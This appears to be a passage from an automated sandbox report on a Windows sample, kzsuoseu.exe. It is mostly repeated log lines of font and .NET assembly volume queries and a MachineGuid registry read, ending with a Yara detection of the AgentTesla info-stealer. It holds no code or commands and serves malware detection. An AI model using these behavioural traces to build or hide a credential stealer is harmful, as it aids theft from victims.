                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Users\Public\kzsuoseu.exe VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Users\Public\kzsuoseu.exe VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Users\Public\kzsuoseu.exe VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\kzsuoseu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 00000020.00000002.512857021.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.512846183.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmp, type: MEMORY
